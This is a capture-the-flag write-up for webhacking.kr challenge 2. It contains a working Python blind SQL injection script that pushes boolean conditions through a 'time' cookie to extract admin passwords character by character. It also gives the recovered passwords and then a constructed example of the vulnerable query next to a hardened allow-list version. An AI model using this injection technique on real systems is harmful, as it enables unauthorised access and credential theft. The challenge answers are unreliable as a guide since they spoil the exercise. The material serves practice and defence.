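The table names were guessed.
Use blind SQL injection to recover the passwords for freeboard and admin. Entering the admin password on the admin page returns another password; extracting the zip file provided on the board with that password yields the key.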
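```python
# webhacking.kr challenge 2
import http.client
import string


def inj(q):
    """Send condition q through the time cookie; return True if the page shows the 'true' marker."""
    con = http.client.HTTPConnection('webhacking.kr')
    head = {'Host': 'webhacking.kr'}
    head['Upgrade-Insecure-Requests'] = '1'
    # The condition is appended to the time cookie as "<timestamp> and <condition>"
    head['Cookie'] = 'id=aaa; PHPSESSID=ddddd; time=1487488213 and ' + q
    con.request('GET', '/challenge/web/web-02/', headers=head)
    r = con.getresponse().read()
    # print(r)
    # The script treats this timestamp in the response as the marker for a true condition
    return b'09:00:01' in r


# print(inj('(select length(password) from admin)=10;'))
arr = list(string.ascii_letters + '1234567890')
print(arr)
adminpw = ''
table = 'admin'  # FreeB0aRd

# Position 5 is probed over ASCII codes 95-99, which are not all covered by arr
for i in range(5, 6):
    for a in range(95, 100):
        q = '(select ascii(substring(password,' + str(i) + ',1)) from admin)=' + str(a) + ';'
        print(q)
        t = inj(q)
        print(chr(a))
        print(t)
        if t:
            adminpw += chr(a)  # a is an int here, so convert it before appending
            print(adminpw)
            break

# Remaining positions are compared against letters and digits
for i in range(5, 11):
    for j, a in enumerate(arr):
        q = '(select ascii(substring(password,' + str(i) + ',1)) from ' + table + ')=' + str(ord(a)) + ';'
        print(q)
        t = inj(q)
        print(a)
        if t:
            adminpw += a
            print(adminpw)
            break
print(adminpw)

# Recovered values
adminpw = '0nly_admin'
freeboardpw = '7598522ae'
```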
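Why the `time` cookie behaves as a boolean oracle, and how validating it removes the signal, shown as an added example (not from the original post and not the challenge's server code). It assumes the server interpolates the cookie into a SQL expression and renders the result as a UTC+9 timestamp; SQLite, the `samplepass` row and all function names are constructed stand-ins.

```python
import re
import sqlite3
from datetime import datetime, timedelta, timezone

KST = timezone(timedelta(hours=9))  # assumed server offset, matching the '09:00:01' marker
BASE = "1487488213 and (select length(password) from admin)="  # shape of the page's probe

def make_db():
    # Constructed stand-in database; the real backend and schema are not shown on the page.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE admin (password TEXT)")
    db.execute("INSERT INTO admin VALUES ('samplepass')")  # constructed 10-character value
    return db

def stamp(seconds):
    return datetime.fromtimestamp(seconds, KST).strftime("%Y-%m-%d %H:%M:%S")

def render_vulnerable(db, time_cookie):
    # Cookie text becomes part of the SQL expression, so "N and (subquery)=x"
    # collapses to 1 or 0 and the rendered second reveals the subquery's truth.
    (value,) = db.execute("SELECT " + time_cookie).fetchone()
    return stamp(value)

def render_hardened(db, time_cookie):
    # Allow only a short run of ASCII digits, then bind it as a parameter.
    if not re.fullmatch(r"[0-9]{1,10}", time_cookie):
        return None  # rejected; a real handler would reset the cookie
    (value,) = db.execute("SELECT ?", (int(time_cookie),)).fetchone()
    return stamp(value)

def leaks_boolean(render, db):
    # True if a true and a false condition produce distinguishable responses.
    return render(db, BASE + "10") != render(db, BASE + "11")
```

With the allow-list in place both probes get the same rejection, so the response no longer differs between a true and a false condition.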